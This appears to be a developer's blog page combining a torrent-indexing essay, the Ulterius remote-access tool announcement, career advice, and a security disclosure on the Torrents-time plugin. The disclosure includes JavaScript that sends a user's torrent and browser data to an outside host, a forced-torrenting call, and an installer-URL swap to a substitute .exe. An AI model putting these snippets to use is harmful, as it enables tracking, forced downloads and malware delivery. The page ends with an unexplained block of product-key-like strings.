Andrew Sampson

Well Ulterius is actually Latin for “beyond, further, on the other side”, that being said a name is a name.

I’ve touched on security in the past, when a user connects to Ulterius a unique RSA pair is generated, this pair is used to encrypt AES key information that is passed to the server. Once the server receives the unique AES information, the handshake is completed and all future traffic is secure. 

   When I shut down Strike last December, millions of users lost their go-to media site, developers who relied on my API lost access to the data, and everyone was left with the all too familiar thought of, "what now?"

   P2P file sharing services collectively suffer from the issue of monetization. Every new torrent tracker on the scene seems to be yet another end-all-be-all centralized source for content. Over time, everyone begins to rely on these sites, they grow larger and larger, the operators make a lot of money, eventually the MPAA or ███ gets angry and has the owners arrested and the site shut down, and the cycle begins anew.

   With Strike I attempted to do something new: a torrent search engine that didn't present you with ads or sponsored content, and instead simply gave the user the ability to find information. Because I had no motivations of profit from it, I was able to make the data free and open for anyone to use, but it still suffered from the issue of being centralized.

   For Strike's final (and abandoned) version, I created a prototype that solved this issue; by creating software that runs on a local system and crawls DHT for infohashes, it cuts out the need for an HTTP-based solution. By writing software that indexes file information into a full-text searchable format, you've already solved the problem. While this process can be slow, the data set grows over time, and you can ensure that the data remains fresh by monitoring active swarms.

   The key to healthy growth, no matter the subject, is to keep development simple. A server counterpart to this should only do a couple of things:

Collect file information from hashes

Query said data

Allow plugins to handle said data

   By creating the means to collect and parse the data, you've done your part. The plugin system means its up for developers to handle the data however they wish. This results in the community constantly creating new solutions to problems and a strive for innovation.

   Imagine that someone creates a plugin that allows you to connect to another person or another community's database, where you can then search for things in both datasets and merge the two. While this would be possible with a plugin-enabled centralized community, users would know that they will always have the same data available to them at all times.

   It's time we said good bye to the traditional trackers and became self-reliant. So long as torrent trackers remain malware-infested hubs with top 100 lists, we are never going to see P2P's image as a piracy haven begin to heal.

Thanks for reading,

Follow me on twitter

Hi,

So since Aurous closed @FrobTheBuilder and I @AndrewMD5 have been busy at work creating new projects, some of them good – others not so much.

After a lot of delays We’re happy to show you one of those projects today and introduce you to Ulterius

What is it?

Ulterius is an open-source, free software utility that provides users with complete access to their computer, all from their browser.

How does it work?

Once you've downloaded and installed Ulterius you simply need to open the client url and login using your existing Windows login. No complicated setup is needed.

What can it do?

Monitor, kill and start processes.

Use cmd, powershell and soon windows-bash.

Browse all your files

Or search through them instantly

Turn any webcam into a home security camera.

Monitor your hardware and network performance.

And most importantly, enjoy fast, low bandwidth, remote-desktop.

Where can I get it?

You can download Ulterius from https://ulterius.io/?q=tum

You can find the source code on Github https://github.com/ulterius

And you can follow development on various twitters

https://twitter.com/andrewmd5

https://twitter.com/frobthebuilder

https://twitter.com/ulteriusapp

People often ask me “what makes a good developer?” The truth is that there is no single answer. Everyone is different, and both possesses and lacks certain traits necessary to being a good programmer. Worry not, though, as these skills can be learned with just a little bit of advice.

With more and more junior developers sending me tweets and emails asking for advice on how to “be like me,” I felt like it was time to dish out some that advice.

Admit when you can’t

When working with a group, if you feel like something you’ve been assigned is outside of your skill range, speak up. By not acknowledging this gap in your skills, you only end up hurting yourself and your team. The purpose of working with a team is to help each other out.

Just because you lack the skills now doesn’t mean you should give up entirely. Observe how your team members solve problems you have problems with, and ask questions if needed. Whatever your issue may be, you should learn how to solve it, even if it does take effort.

Don’t take anything for granted

Every line of code you write is progress. Even the smallest of your projects has the potential to aid in a future undertaking, and the ideas you have as afterthoughts have the ability to shape your life. Don’t take what you make for granted, because you never know when it might pay off.

Be ready for failure

The world of software development can be a jungle; long hours, a lack of sleep, and a do-or-die attitude can cause emotions to flare in unpredictable ways. Sometimes you will fail, but don’t worry; it’s ok. Don’t let failure deter you from pushing ahead. As in life, you’re going to hit a lot of walls as part of your progress, but it’s important that you don’t give up. Hone your craft until you’re happy with everything you create. Chances are that your first app won’t rake in a million bucks, but it should make you feel like it did.

Learn from others

When someone critiques your code, mentions how something could be done better, or offers a suggestion, don’t take it as a personal attack or insult, and don’t become defensive. Listen to what they have to say, as this is one of the best ways to better yourself. If many people are telling you that you’ve done something wrong, chances are that you have. Be ready to admit when you’ve made a mistake.

Again, there is nothing wrong with asking for help, and if anything, I encourage it. If you find a code snippet that solves your problem, learn why and how it works, and see if you concoct a better implementation before relying on a third-party solution.

Take risk

Don’t be afraid to invest yourself in a project. Don’t be afraid to work at a start-up. Don’t be afraid to compete in a hackathon. Everything you do benefits you in some way, and the only thing standing in your way is yourself. Go all-in if you truly believe in something.

Have thick skin

If you reach any sort of notoriety, people are going to call you names, argue with you, and try and butt heads. You’re bound to be stressed, but you can let this drive you down. If petty names and insults encourage you to stop being a developer, you need to grow up. The world isn’t rainbows and sunshine, even if your employer paints a picture of a big happy family; at the end of the day, you are receiving cold monetary compensation in exchange for the labor you performed. Just do your job well and don’t let the small stuff hurt you.

Likewise, don’t attack other people because you disagree with them. If another person is doing something you believe to be wrong, calmly explain the problem. If they ignore or insult you, leave them to their devices. If you’re feeling particularly sadistic, pay attention as they fail, being sure to note to not do the thing they did in the future.

Don’t compare yourself to others

You will never be your idol. Everyone learns differently, and everyone has differing abilities. You can be great at backend development and cause a train wreck when touching anything relating to frontend. As the old adage goes, it’s better to be a master of one trade than a jack of them all. Focus on what you’re good at, learn what you want, and be happy with what you’ve made and can do. It’s o.k. to respect people and look up to them, but don’t envy them, for that will only slow you down.

In conclusion

I hope this advice is helpful to any aspiring developers. The biggest deterrent to programmers tends to be insecurity and a lack of willpower, and I hate to think that some of the most talented people who have ever come into programming were stopped short because of it. This is nowhere near all of the advice needed for someone to become a programmer extraordinaire, but it should help many people struggling to break through.

We may not become billionaires, but we can sure feel like we are.

What is Torrents-time

A “new” method of streaming torrents in your web browser, based around existing technologies Torrents-time was quickly adopted by a majority of torrent sites due to its ability to embed a player on the page to stream video content from torrents.

Tear down

Torrents-time bind the following ports

8082:nodejs webserver

12400:main application

9220:web socket server

Exposed API

https://localhost.ttconfig.xyz:12400/api.js

https://127.0.0.1:12400/api.js - leads to a insecure https connection, it listens for request.

https://localhost.ttconfig.xyz:12400/vpnpropmt?version=r1 - block this and all things related to it. Anonymous VPN are very untrustworthy and make you the product.

3rd parties being called (why would you do this)

1337.to

moviedb

anonymousvpn

Profiting from VPN “partnership”, trusting a random VPN service is a writeup for another day.

Attack Vectors

This service stupidly abuses CORS, even worse it exposes a CORS enabled XHR object after requesting an instance of the plugin. So lets take advantage of that.

We don’t need anything more to do this attack than

<html> <title>Hello World</title> <head lang="en"> <script src="torrents.js"></script> <script src="https://localhost.ttconfig.xyz:12400/api.js"></script> <script src="attack.js"></script> <meta charset="UTF-8"> <title></title> </head> <body> </body> </html>

Where torrents.js is their CDN code, once we have the first two scripts loaded attack.js can make use of all of torrentsTime useful functions on any page.

So in a few seconds we can get torrentTime on any HTML5 page, that's great!

Except now I’m free to do a few things.

Concern 1 - Forced Piracy

Because I can make an invisible player, I’m free to force you to torrent whatever I like, even if you had no intention of streaming said content with a line of code

torrentsTime.instances.i0.start();

Great, you were just forced to torrent illegal content insecurely. You can do this for an unlimited amount of content. I can use any publisher ID as well.

Concern 2 - User Tracking/Privacy

Lets say I’m an advertiser/group with access to javascript on a website, with a few lines of code, not only can I tell who you are, I can send all that data using torrentsTime very exposed xhr object.

function driveBy() { //Torrents-time detected! //i0 is the first instance, loop over instances to get all currently started torrents var torrentTitle = torrentsTime.instances.i0.setup.title; var browser = torrentsTime.instances.i0.setup.browser; var filetype = torrentsTime.instances.i0.setup.fileType; //any other code we want to do on the page //this supports callback/JSONP //use the exposed xhr torrentsTime.utils.xhr("https://andrew.im/sandbox/tracktt.php?title=" + torrentTitle + "&browser=" + browser + "&filetype=" +filetype, callback); } function callback(data) { console.log(data); }

Instant results

Concern 3 - Even more privacy issues

Every time you make a request to the CDN the following data is logged by Torrents-time servers

IP, location (country), user agent, cookies, and and likely the exact page you requested the CDN from. Further more within the C code you can see the use of private keys masking SOMETHING which does indeed make http request, I've yet to break this.

Concern 4 - It runs as root on OSX

It runs as root on OSX. I really don't need to say more.

Concern 5 - Redirect Plugin DownloadX

Redirecting the download for the plugin is again only a single line of code torrentsTime.setup.installerURL.windows = "https://andrew.im/sandbox/torrentsTime-download.exe"; After that you just fire torrentsTime.downloadInstaller(); Or when a user clicks the plugin download, they will be greeted with a legit looking prompt

Of course the application isn't the installer for the plugin, its your own application.

Concern 6 - XSS

Seems just about every site with TT installed is vunerable to XSS now.

Piratebay

Concern 7 - Sky rocket cpu usage/crash it

Literally just ping the server with 1024 bytes and the cpu usage stays between 50% and 80%, no idea why this one even occurs. Program later crashes when sending random strings, so possible bufferoverflow waiting to be exploited.

Concern 8 - Bundled Certs

includes the private keys to their for 'encrypted' comms channel. Details here UPDATE their cert for localhost has been revoked.

Resources

You can download Torrents-time c-code here, as well as all the NODEJS used on your computer

https://mega.nz/#F!pklQQChQ!1VCTBgQQ9ticT8rm_TzGRw

Threat level

Seriously, remove this software from your computer, if you put it on your site, remove it, if you think about adding it, don’t. More exploits coming soon!

Even more info written by /u/thecodingdude can be found on Reddit

Contact

Andrew Sampson

@Andrewmd5

RB8MY-3RBTP-TK6RJ RJCCE-37EA2-04TCW GPF6G-X6Q44-3K4PM 43YM0-AWL6H-54KRX RWF20-H3JB8-EYGE7 WIAIE-FTQ8D-PPCIZ FG2HF-MF26J-APTYT 3WNNX-MWDWY-CBDAP NK6KN-0HQC3-B38LM EEDHQ-ZC9T4-2MLBG PB9GR-IRD66-9ERMD NYI23-DRR5C-W3VK7 95H39-LG6WB-PNZEA